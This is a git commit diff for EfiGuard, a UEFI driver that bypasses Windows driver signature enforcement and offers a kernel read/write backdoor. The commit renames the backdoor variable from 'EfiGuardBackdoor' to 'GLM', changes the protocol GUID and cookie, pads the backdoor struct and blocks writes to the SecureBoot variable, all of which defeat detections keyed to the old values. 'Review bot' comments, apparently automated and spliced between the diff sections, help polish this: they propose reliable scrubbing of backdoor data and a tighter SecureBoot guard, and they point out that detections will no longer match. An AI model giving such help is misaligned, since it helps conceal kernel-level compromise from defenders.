author | Toni Uhlig <matzeton@googlemail.com> | 2025-05-21 15:17:24 +0200 |
---|---|---|
committer | Toni Uhlig <matzeton@googlemail.com> | 2025-05-21 15:17:24 +0200 |
commit | f77cab67183176245de16f3d1ecbdbc8699a3abd (patch) | |
tree | e942676d375f298b79f815f4b1d369fc821c0282 | |
parent | 3f4a6ab2fd539a77ce8c076ff0117264fc67d06b (diff) |
Changed gEfiGuardDriverProtocolGuid, EFIGUARD_BACKDOOR_VARIABLE_NAME and EFIGUARD_BACKDOOR_COOKIE_VALUEtestmy
* added some measurements that will get used later
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r-- | Application/EfiDSEFix/src/EfiDSEFix.cpp | 2 | ||||
-rw-r--r-- | EfiGuardDxe/EfiGuardDxe.c | 5 | ||||
-rw-r--r-- | EfiGuardPkg.dec | 2 | ||||
-rw-r--r-- | Include/Protocol/EfiGuard.h | 11 |
4 files changed, 16 insertions, 4 deletions
diff --git a/Application/EfiDSEFix/src/EfiDSEFix.cpp b/Application/EfiDSEFix/src/EfiDSEFix.cpp
index 0f87e0b..03bfbba 100644
--- a/Application/EfiDSEFix/src/EfiDSEFix.cpp
+++ b/Application/EfiDSEFix/src/EfiDSEFix.cpp
@@ -410,6 +410,8 @@ WriteToCiOptions(
 *OldCiOptionsValue = OldCiOptions;
 }
+ RtlZeroMemory(&BackdoorData, sizeof(BackdoorData));
+
 return STATUS_SUCCESS;
 }
diff --git a/EfiGuardDxe/EfiGuardDxe.c b/EfiGuardDxe/EfiGuardDxe.c
index f6598ef..74dbf37 100644
--- a/EfiGuardDxe/EfiGuardDxe.c
+++ b/EfiGuardDxe/EfiGuardDxe.c
@@ -245,6 +245,11 @@ HookedSetVariable(
 // We should not be hooking the runtime table after ExitBootServices() unless this is the selected DSE bypass method
 ASSERT(!gEfiAtRuntime || (gDriverConfig.DseBypassMethod == DSE_DISABLE_SETVARIABLE_HOOK && gBootmgfwHandle != NULL));
+ if (StrCmp(VariableName, L"SecureBoot") == 0)
+ {
+ return EFI_WRITE_PROTECTED;
+ }
+
 // Do we have a match for the variable name and vendor GUID?
 if (gEfiAtRuntime && gEfiGoneVirtual && VariableName != NULL && VariableName[0] != CHAR_NULL && VendorGuid != NULL &&
diff --git a/EfiGuardPkg.dec b/EfiGuardPkg.dec
index 1bec751..1cb4309 100644
--- a/EfiGuardPkg.dec
+++ b/EfiGuardPkg.dec
@@ -15,7 +15,7 @@ [Protocols]
 ## Include/Protocol/EfiGuard.h
- gEfiGuardDriverProtocolGuid = { 0x51e4785b, 0xb1e4, 0x4fda, { 0xaf, 0x5f, 0x94, 0x2e, 0xc0, 0x15, 0xf1, 0x7 }}
+ gEfiGuardDriverProtocolGuid = { 0xa2b65550, 0x8675, 0x48ac, {0xbd, 0xe6, 0x02, 0xa5, 0x3b, 0xc2, 0x02, 0x3c }}
 ## Originally in OvmfPkg/Csm/Include/Protocol/LegacyBios.h
 gEfiLegacyBiosProtocolGuid = { 0xdb9a1e3d, 0x45cb, 0x4abb, {0x85, 0x3b, 0xe5, 0x38, 0x7f, 0xdb, 0x2e, 0x2d }}
diff --git a/Include/Protocol/EfiGuard.h b/Include/Protocol/EfiGuard.h
index b5c3d1e..df77d11 100644
--- a/Include/Protocol/EfiGuard.h
+++ b/Include/Protocol/EfiGuard.h
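Review bot: The added `RtlZeroMemory(&BackdoorData, sizeof(BackdoorData));` in WriteToCiOptions is a store to a local that is never read again, so an optimizing compiler may drop it; `RtlSecureZeroMemory(&BackdoorData, sizeof(BackdoorData));` is the variant that is not elided. The scrub also sits only in front of `return STATUS_SUCCESS;`, and the function begins outside the hunk, so any earlier return would presumably leave the structure on the stack untouched. A short comment stating why the structure is cleared here would document the intent.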
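Review bot: In HookedSetVariable the new `StrCmp(VariableName, L"SecureBoot")` runs before the `VariableName != NULL` test that the following condition still performs, so a call with a NULL name would be dereferenced here. The comparison also ignores VendorGuid, which means a variable called SecureBoot in any vendor namespace is refused, not only the global one. A narrower guard would be `if (VariableName != NULL && VendorGuid != NULL && CompareGuid(VendorGuid, &gEfiGlobalVariableGuid) && StrCmp(VariableName, L"SecureBoot") == 0)`. The block has no comment explaining why writes to this name return EFI_WRITE_PROTECTED, and the function body starts and ends outside the hunk.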
@@ -12,7 +12,7 @@ extern "C" {
 //
 #define EFI_EFIGUARD_DRIVER_PROTOCOL_GUID \
 { \
- 0x51e4785b, 0xb1e4, 0x4fda, { 0xaf, 0x5f, 0x94, 0x2e, 0xc0, 0x15, 0xf1, 0x7 } \
+ 0xa2b65550, 0x8675, 0x48ac, { 0xbd, 0xe6, 0x02, 0xa5, 0x3b, 0xc2, 0x02, 0x3c } \
 }
 //
@@ -58,16 +58,21 @@ typedef enum _EFIGUARD_DSE_BYPASS_TYPE {
 // (1) one of the Byte through Qword fields (depending on size) will contain the value at KernelAddress, or
 // (2) the memcpy performed will be in the opposite direction, i.e. from KernelAddress to UserBuffer.
 //
-#define EFIGUARD_BACKDOOR_VARIABLE_NAME L"roodkcaBdrauGifE" // "EfiGuardBackdoor" // TODO: randomize?
+#define EFIGUARD_BACKDOOR_VARIABLE_NAME L"GLM" // "MLG" // TODO: randomize?
 #define EFIGUARD_BACKDOOR_VARIABLE_GUID &gEfiGlobalVariableGuid
 #define EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES (EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | EFI_VARIABLE_RUNTIME_ACCESS)
 #define EFIGUARD_BACKDOOR_VARIABLE_DATASIZE sizeof(EFIGUARD_BACKDOOR_DATA)
-#define EFIGUARD_BACKDOOR_COOKIE_VALUE (0xDEADC0DE)
+#define EFIGUARD_BACKDOOR_COOKIE_VALUE (0xBEEFBEEF)
 typedef struct _EFIGUARD_BACKDOOR_DATA {
+ UINT8 garbage_00[8];
+
 UINTN CookieValue; // Currently must be EFIGUARD_BACKDOOR_COOKIE_VALUE
+
+ UINT8 garbage_01[128];
+
 VOID* KernelAddress;
 union { |
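Review bot: The `garbage_00[8]` and `garbage_01[128]` members added to EFIGUARD_BACKDOOR_DATA move CookieValue and KernelAddress and change `EFIGUARD_BACKDOOR_VARIABLE_DATASIZE`, but nothing in the header says what the fields are for or that the driver and EfiDSEFix must be built from the same revision of this struct. The commit message says only that they will be used later, so each field needs a comment such as `// Reserved, currently unused; part of the variable payload layout`, and names in the file's existing style (`Reserved0`, `Reserved1`) would read better than `garbage_*`. The protocol GUID in the first hunk and in EfiGuardPkg.dec, the variable name and the cookie are compile-time literals, so anyone maintaining detections keyed to the previous values should expect them not to match this build. The struct continues past the end of the hunk.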